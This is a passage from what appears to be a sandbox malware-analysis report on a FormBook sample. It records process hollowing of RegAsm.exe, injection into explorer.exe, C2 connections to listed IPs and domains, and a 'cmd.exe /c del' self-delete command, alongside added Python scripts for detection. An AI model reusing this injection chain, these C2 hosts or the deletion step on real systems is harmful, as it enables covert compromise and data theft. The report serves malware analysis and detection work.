          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function reads the PEB (mov eax/ecx, dword ptr fs:[00000030h]). fs:[00000030h] is the PEB pointer in the 32-bit TEB; code loads it both for anti-debug checks (PEB.BeingDebugged, PEB.NtGlobalFlag) and for ordinary loader work such as walking PEB.Ldr to resolve APIs, so the number of reads by itself does not prove anti-debugging. One row per function, with the number of such reads reported in it:

            Function          Register(s)         PEB reads
            5_2_02FA23E3      ecx (2), eax (1)    3
            5_2_02F753CA      eax                 2
            5_2_02FC5BA5      eax                 1
            5_2_02F24BAD      eax                 3
            5_2_02F2B390      eax                 1
            5_2_02F22397      eax                 1
            5_2_02FB138A      eax                 1
            5_2_02F2138B      eax                 3
            5_2_02FAD380      ecx                 1
            5_2_02F01B8F      eax                 2
            5_2_02F23B7A      eax                 2
            5_2_02EFDB60      ecx                 1
            5_2_02FC8B58      eax                 1
            5_2_02EFDB40      eax                 1
            5_2_02EFF358      eax                 1
            5_2_02FB131B      eax                 1
            5_2_02F1A309      eax                 21
            5_2_02EF58EC      eax                 1
            5_2_02EF40E1      eax                 3
            5_2_02F1B8E4      eax                 2
            5_2_02F8B8D0      eax (5), ecx (1)    6
            5_2_02F2F0BF      ecx (1), eax (2)    3
            5_2_02F220A0      eax                 6
            5_2_02F390AF      eax                 1
            5_2_02EF9080      eax                 1
            5_2_02F73884      eax                 2
            5_2_02FB2073      eax                 1
            5_2_02FC1074      eax                 1
            5_2_02F10050      eax                 2
            5_2_02F1A830      eax                 4
            5_2_02F0B02A      eax                 4
            5_2_02F2002D      eax                 5
            5_2_02F77016      eax                 3
            5_2_02FC4015      eax                 2
            5_2_02EFB1E1      eax                 3
            5_2_02F841E8      eax                 1
            5_2_02F751BE      eax                 4
            5_2_02F199BF      ecx (8), eax (4)    12
            5_2_02F769A6      eax                 1
            5_2_02F261A0      eax                 2
            5_2_02FB49A4      eax                 4
            5_2_02F22990      eax                 1
            5_2_02F1C182      eax                 1
            5_2_02F2A185      eax                 1
            5_2_02EFC962      eax                 1
            5_2_02EFB171      eax                 2
            5_2_02F1B944      eax                 2
            5_2_02F2513A      eax                 2
            5_2_02F14120      eax (4), ecx (1)    5
            5_2_02EF9100      eax                 3
            5_2_02F216E0      ecx                 1
            5_2_02F076E2      eax                 1
            5_2_02FC8ED6      eax                 1
            5_2_02F38EC7      eax                 1
            5_2_02FAFEC0      eax                 1
            5_2_02F236CC      eax                 1
            Total: 144 PEB reads in 56 functions

          Source: C:\Users\user\Desktop\NQQWym075C.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Memory allocated: page read and write | page guard
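          The fs:[00000030h] hits listed above are dynamic observations. The script below is an added example (not Joe Sandbox code and not bytes from the sample) of the static check a practitioner would run over a dumped 32-bit code region to find the same PEB loads and to name the PEB field the next instruction reads, which separates BeingDebugged/NtGlobalFlag anti-debug checks from Ldr walks used for API resolution. The byte patterns are the standard x86 encodings; the input buffer and the register names are constructed for the demonstration.

```python
"""Static counterpart to the fs:[00000030h] hits above: scan raw 32-bit x86
code for loads of the PEB pointer and name the PEB field the next instruction
touches. Added example; not Joe Sandbox code and not bytes from the sample."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields commonly read straight after the fs:[30h] load.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# Opcodes with a ModRM memory operand that usually carry the follow-up read:
# movzx r32,r/m8; mov r8,r/m8; mov r32,r/m32; grp1 r/m8,imm8; grp1 r/m32,imm8; test r/m8,imm8
FOLLOW_OPCODES = [b"\x0f\xb6", b"\x8a", b"\x8b", b"\x80", b"\x83", b"\xf6"]


@dataclass
class PebAccess:
    offset: int            # byte offset of the fs:[30h] load
    reg: str               # register that receives the PEB pointer
    field: Optional[str]   # PEB field read by the next instruction, if recognised


def _peb_load_at(code: bytes, i: int) -> Optional[Tuple[str, int]]:
    """(reg, length) if code[i:] encodes 'mov r32, dword ptr fs:[30h]'."""
    # 64 A1 30 00 00 00        mov eax, fs:[30h]   (moffs32 form)
    if code[i:i + 6] == b"\x64\xa1\x30\x00\x00\x00":
        return "eax", 6
    # 64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM mod=00 rm=101 disp32)
    if code[i:i + 2] == b"\x64\x8b" and len(code) >= i + 7:
        modrm = code[i + 2]
        if (modrm & 0xC7) == 0x05 and code[i + 3:i + 7] == b"\x30\x00\x00\x00":
            return REGS[(modrm >> 3) & 7], 7
    return None


def _field_read_at(code: bytes, j: int, reg: str) -> Optional[str]:
    """Name the PEB field if code[j:] reads [reg + disp8] via a known opcode."""
    for opcode in FOLLOW_OPCODES:
        if code[j:j + len(opcode)] != opcode:
            continue
        k = j + len(opcode)
        if k + 1 >= len(code):
            return None
        modrm, disp8 = code[k], code[k + 1]
        # mod=01 -> [base + disp8]; rm must be the register holding the PEB.
        # (rm=100 would need a SIB byte; a PEB pointer in esp is not realistic.)
        if (modrm >> 6) == 1 and REGS[modrm & 7] == reg:
            return PEB_FIELDS.get(disp8, f"PEB+0x{disp8:02x}")
    return None


def find_peb_accesses(code: bytes) -> List[PebAccess]:
    """Linear byte scan (no disassembler), so hits inside data are possible noise."""
    hits: List[PebAccess] = []
    i = 0
    while i < len(code):
        load = _peb_load_at(code, i)
        if load is None:
            i += 1
            continue
        reg, length = load
        hits.append(PebAccess(i, reg, _field_read_at(code, i + length, reg)))
        i += length
    return hits


# Constructed buffer for the demonstration (not from NQQWym075C.exe).
SAMPLE = bytes.fromhex(
    "90 90 "                    # nop; nop
    "64 a1 30 00 00 00 "        # mov eax, fs:[30h]
    "0f b6 40 02 "              # movzx eax, byte ptr [eax+2]   -> PEB.BeingDebugged
    "85 c0 "                    # test eax, eax
    "64 8b 0d 30 00 00 00 "     # mov ecx, fs:[30h]
    "8b 49 0c "                 # mov ecx, [ecx+0Ch]            -> PEB.Ldr (API resolution)
    "c3"                        # ret
)

if __name__ == "__main__":
    for h in find_peb_accesses(SAMPLE):
        print(f"+0x{h.offset:04x}: PEB -> {h.reg}, next reads {h.field or 'nothing recognised'}")
```

          Run it over the unpacked RegAsm.exe region (for example the 5.2.RegAsm.exe.400000.0.unpack file this report offers) and compare the offsets against the 5_2_ function addresses above; a load whose follow-up is Ldr is loader plumbing, one whose follow-up is BeingDebugged or NtGlobalFlag is the anti-debug check.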

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 192.64.147.164 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.64 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.112 80
          Source: C:\Windows\explorer.exe | Network Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exe | Network Connect: 160.122.148.234 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.49.23.141 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 65.254.250.119 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread register set: target process: 3388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 100000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B80000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E4A008
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: explorer.exe, 00000003.00000002.483381434.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Queries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Queries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
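          As an added example (not Joe Sandbox code) of turning the hits in this section into an injection chain, the script below parses lines of the form shown here, normalized to "Source: <process> | <event>: <detail>", links each injector to its target, and re-derives three of the findings above: a Windows system process (explorer.exe) connecting to the network after memory was mapped and an APC queued into it, unmapping of a process image that was also mapped into (hollowing), and the cmd.exe /c del removal of the RegAsm.exe launcher. The embedded lines are copied from this section; the SYSTEM_IMAGES set is an assumption made for the demonstration, and "Thread register set" lines are not chained because they carry only a PID.

```python
import re
from collections import defaultdict

# Lines copied from this section of the report, normalized to
# "Source: <process> | <event>: <detail>" (one Joe Sandbox hit per line).
REPORT = r"""
Source: C:\Windows\explorer.exe | Network Connect: 192.64.147.164 80
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.64 80
Source: C:\Users\user\Desktop\NQQWym075C.exe | Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B80000
Source: C:\Users\user\Desktop\NQQWym075C.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E4A008
Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
"""

LINE = re.compile(r"^Source: (?P<src>.+?) \| (?P<event>[^:]+): (?P<detail>.*)$")
WIN_PATH = re.compile(r"[A-Za-z]:\\[^ ]+")   # first Windows path inside a detail field
INJECT_EVENTS = {"Section loaded", "Thread APC queued", "Memory written", "Section unmapped"}
# Assumed set of Windows images that should never originate C2 traffic on their own.
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "wlanext.exe", "cscript.exe"}


def image(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(report: str) -> dict:
    injected = defaultdict(set)   # target image -> {(injector image, event)}
    unmapped = set()              # targets whose mapped image section was unmapped
    connects = defaultdict(set)   # image -> {(ip, port)}
    created = []                  # (parent image, child image, full detail)
    for line in report.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        src, event, detail = image(m["src"]), m["event"], m["detail"]
        if event == "Network Connect":
            ip, port = detail.split()
            connects[src].add((ip, int(port)))
        elif event in INJECT_EVENTS:
            path = WIN_PATH.search(detail)
            if path:
                target = image(path.group())
                injected[target].add((src, event))
                if event == "Section unmapped":
                    unmapped.add(target)
        elif event == "Process created":
            path = WIN_PATH.search(detail)
            if path:
                created.append((src, image(path.group()), detail))

    findings = []
    # 1. A Windows system process talking to the network after someone mapped
    #    memory or queued an APC into it: the "system process connects" signature.
    for proc, peers in connects.items():
        if proc in SYSTEM_IMAGES and proc in injected:
            findings.append(("system process connects to network", proc, sorted(peers)))
    # 2. Hollowing: the original image was unmapped and a new section mapped in.
    for target in sorted(unmapped):
        if any(ev == "Section loaded" for _, ev in injected[target]):
            findings.append(("process hollowing", target, sorted({i for i, _ in injected[target]})))
    # 3. The injected stage erasing its launcher through cmd.exe.
    for parent, child, detail in created:
        if child == "cmd.exe" and " del " in detail.lower():
            findings.append(("self-delete via cmd", parent, detail))
    return {"injected": {k: sorted(v) for k, v in injected.items()}, "findings": findings}


if __name__ == "__main__":
    for kind, who, what in analyze(REPORT)["findings"]:
        print(f"{kind:36} {who:14} {what}")
```

          The same three rules translate directly into EDR or Sysmon logic: an image-section map or APC into a process followed by outbound traffic from that process, an unmap of a suspended child's image base, and a cmd.exe child of the injected process deleting the parent's original executable.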

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          MITRE ATT&CK Matrix

          The matrix is rendered here as one list per tactic column (digits after a technique name are the count badges carried over from the rendered matrix, kept as extracted):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection 612; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Virtualization/Sandbox Evasion 3; Disable or Modify Tools 1; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 4; Software Packing 3; DLL Side-Loading 1
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery 131; Virtualization/Sandbox Evasion 3; Process Discovery 2; Application Window Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 111
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 3; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 321308; Sample: NQQWym075C.exe; Start date: 20/11/2020; Architecture: WINDOWS; Score: 100)

The graph image is not reproduced here; its process tree, per-process signatures and network endpoints are:

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 2 other signatures.
Sample-level DNS/IP: www.qzrpxx.com; www.keitakora.com; 3 other IPs or domains.

NQQWym075C.exe (started)
    Signatures: Maps a DLL or memory area into another process
    +-- RegAsm.exe (started)
    |       Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    |       +-- explorer.exe (injected)
    |               Signatures: System process connects to network (likely due to code injection or exploit)
    |               Network: www.sabaicraft.com 192.64.147.164, ports 49743, 80, VOODOO1US, United States; thrust-board.com 34.102.136.180, ports 49728, 49730, 49745, GOOGLEUS, United States; 14 other IPs or domains
    |               +-- wlanext.exe (started)
    |               |       Network: www.sz360buy.com
    |               |       Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
    |               |       +-- cmd.exe (started)
    |               |               +-- conhost.exe (started)
    |               +-- cscript.exe (started)
    +-- NQQWym075C.exe (started, second instance)
            Signatures: Writes to foreign memory regions
            +-- RegAsm.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
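The chain in the graph above (the sample hollows RegAsm.exe, RegAsm.exe injects into explorer.exe, and explorer.exe then starts wlanext.exe and cscript.exe, with cmd.exe under wlanext.exe) is what a host-based rule should key on: explorer.exe spawning a network-capable system binary is only suspicious once a foreign process has written into it. The following is an added example written for this page, not code from the report or from Joe Sandbox. It correlates constructed process-create and cross-process-injection events shaped loosely after what Sysmon event IDs 1 and 8/10 carry (the Event record, the PIDs and the LOLBIN_CHILDREN set are assumptions; the set holds only the two explorer.exe children this report observed):

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Event:
    ts: int        # monotonically increasing event order
    kind: str      # "create": source spawned target; "inject": source wrote to / hijacked a thread in target
    source: str    # image name of the acting process
    spid: int
    target: str    # image name of the created or injected process
    tpid: int


# Children of an injected explorer.exe seen in this report. A production rule would
# carry the broader list of system binaries FormBook is known to select from.
LOLBIN_CHILDREN = {"wlanext.exe", "cscript.exe"}

# Constructed telemetry (not real Sysmon output) reproducing the behavior graph:
# NQQWym075C.exe -> RegAsm.exe -> injects explorer.exe -> wlanext.exe -> cmd.exe,
# explorer.exe -> cscript.exe, plus one benign explorer.exe child that must not alert.
SAMPLE_EVENTS: List[Event] = [
    Event(1, "create", "explorer.exe", 1000, "NQQWym075C.exe", 2001),
    Event(2, "create", "NQQWym075C.exe", 2001, "RegAsm.exe", 2002),
    Event(3, "inject", "RegAsm.exe", 2002, "explorer.exe", 1000),
    Event(4, "create", "explorer.exe", 1000, "wlanext.exe", 2003),
    Event(5, "create", "wlanext.exe", 2003, "cmd.exe", 2004),
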